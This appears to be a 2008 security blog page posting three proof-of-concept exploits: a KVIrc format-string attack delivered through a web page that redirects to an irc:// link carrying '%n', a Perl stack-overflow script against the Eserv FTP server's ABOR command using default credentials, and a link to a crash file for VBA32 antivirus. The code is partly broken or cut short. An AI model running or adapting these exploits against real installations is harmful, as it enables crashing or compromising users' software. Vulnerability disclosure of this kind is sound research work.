24 October, 2008

KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)


KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)

Summary: KVIrc is a free portable IRC client based on the excellent Qt GUI toolkit.
KVirc is being written by Szymon Stefanek and the KVIrc Development Team with
the contribution of many IRC addicted developers around the world.

Product web page: http://www.kvirc.net/

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [d0t] com





<title>KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)</Title>



<center> <br /> <br /> <strong>Warning ! :)</strong> </center>

<body bgcolor="#FFFF00">

<script type="text/javascript">

alert("KVIrc v3.4.0 Virgo Remote Format String Exploit (PoC)\n\n\t\tby LiquidWorm (c) 2008");

function poc()
window.location.href = "irc://A:%n -i";

var answ = confirm("Press OK to start exploitation\nPress Cancel to skip exploitation");

if (answ == true)

window.location.href = "http://www.kvirc.net";

</script> </body> </head> </html>


PoC: http://zeroscience.org/codes/kvirc_fs.html

14 October, 2008

Eserv/3.x FTP Server (ABOR) Remote Stack Overflow PoC


# Eserv/3.x FTP Server (ABOR) Remote Stack Overflow PoC
# Summary: Eserv/3.x - Mail, News, Web and Proxy Servers - Mail
# Server (SMTP, IMAP4 and POP3) - News Server (NNTP) - Web Server
# (HTTP) - FTP Server - Proxy Servers (HTTP, FTP, Socks, etc) - Finger
# Server - Built-in scheduler and dialer.
# Product web page: http://www.eserv.ru/ | www.etype.net/eserv/
# Tested on Microsoft Windows XP SP2 (English)
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm [t00t] gmail.com
# http://www.zeroscience.org
# 14.10.2008

use Net::FTP;

$ipaddr = "";
$mana = "..?" x 13000;
$user = "admin";
$pass = "nimda";
$port = 21;

$ftp = Net::FTP->new("$ipaddr", Debug => 0) || die "Cannot connect to $ipaddr on port $port: $@";
$ftp->login($user,$pass) || die "Cannot login ", $ftp->message;



print "\nDone!\n";



03 October, 2008

VBA32 Personal Antivirus 3.12.8.x (malformed archive) Denial of Service PoC

Summary: Antivirus program for personal computers running Windows which is a reliable and, it is crucial, quick tool to detect and neutralize computer viruses, mail worms, trojan programs and other malware (backdoors, adware, spyware, etc) in real time and by request.

Desc: VBA32 (VirusBlokAda) Personal Version 3.12.8.x suffers from a denial of service vulnerability that causes memory corruption and causing the software to crash while scanning a malformed archive.

Product web page: http://www.anti-virus.by/en/personal.html

Tested on Microsoft Windows XP SP2 (English)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic

liquidworm [t00t] gmail [m00t] com



PoC: http://zeroscience.org/codes/vba32_poc.rar
